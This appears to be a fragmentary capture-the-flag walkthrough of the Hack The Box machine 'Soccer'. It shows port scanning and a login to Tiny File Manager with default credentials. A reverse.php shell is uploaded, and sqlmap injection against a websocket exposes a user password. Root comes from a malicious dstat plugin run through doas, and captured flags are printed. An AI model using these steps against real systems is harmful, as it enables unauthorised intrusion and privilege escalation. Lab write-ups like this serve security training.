Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.194 | TCP:22,80,9091 |
$ ip='10.10.11.194'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
bash
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
| 256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
|_ 256 5797565def793c2fcbdb35fff17c615c (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
9091/tcp open xmltec-xmlmail?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix:
| HTTP/1.1 400 Bad Request
| Connection: close
| GetRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 139
| Date: Mon, 10 Feb 2025 09:01:42 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot GET /</pre>
| </body>
| </html>
| HTTPOptions, RTSPRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Date: Mon, 10 Feb 2025 09:01:43 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot OPTIONS /</pre>
| </body>
|_ </html>Tiny 2.4.3
# echo '10.10.11.194 soccer.htb'>>/etc/hosts
$ feroxbuster -u 'http://soccer.htb/'
https://github.com/prasathmani/tinyfilemanager
admin/admin@123\] OR \[user/12345
http://soccer.htb/tiny/tinyfilemanager.php?p=tiny%2Fuploads\&upload
$ curl http://soccer.htb/tiny/uploads/reverse.php
Websocket SQLI
www-data@soccer:/$ cat /etc/hosts
# echo '10.10.11.194 soc-player.soccer.htb'>>/etc/hosts
$ websocat ws://soc-player.soccer.htb:9091
$ /home/maptnh/sqlmap-dev/sqlmap.py -u 'ws://soc-player.soccer.htb:9091' --data '{"id":"*"}' --batch --level 5 --risk 3 --threads 10 --dbs
username:player
password:PlayerOftheMatch2022
User.txt
f07036b231022261fd0734ac994534dd
Privilege Escalation:Doas && dstat
player@soccer:/tmp$ cat /usr/local/etc/doas.conf
player@soccer:/tmp$ echo 'import os; os.system("/bin/bash")' > /usr/local/share/dstat/dstat_bash.py
player@soccer:/tmp$ doas /usr/bin/dstat --lis
player@soccer:/tmp$ doas /usr/bin/dstat --bash
Root.txt
ed0c81afb79ac34cabd884fdc3149dbd